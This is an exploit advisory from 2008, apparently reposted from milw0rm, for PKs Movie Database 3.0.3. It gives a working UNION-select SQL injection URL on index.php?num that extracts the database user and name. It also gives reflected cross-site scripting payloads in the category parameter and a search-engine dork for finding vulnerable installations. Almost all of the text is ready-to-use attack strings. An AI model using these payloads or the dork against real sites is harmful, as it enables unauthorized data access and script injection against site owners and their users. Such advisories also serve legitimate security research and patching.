PK-Designs PKs Movie Database 3.0.3 - Cross-Site Scripting / SQL Injection



EKU-ID: 13042 CVE: OSVDB-ID:
Author: Houssamix Published: 2008-02-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix From H-T Team
= Script : PKs Movie Database version 3.0.3

= Original advisory : https://www.securityfocus.com/bid/27713/

= BUG 1 :  Remote SQL Injection Vulnerability

exploit => www.target.com/path/index.php?num=-1%20union%20select%201,2,3,4,5,6,user(),database(),9,10,11,12,13,14,15,16,17,18,19,20

= BUG 2 : XSS

exploit => www.target.com/path/index.php?category=[XSS]
           www.target.com/path/index.php?num=9999999999&category=[XSS]

example : www.target.com/path/index.php?category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
           www.target.com/path/index.php?num=9999999999&category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

= Dork : "PKs Movie Database"

# milw0rm.com [2008-02-10]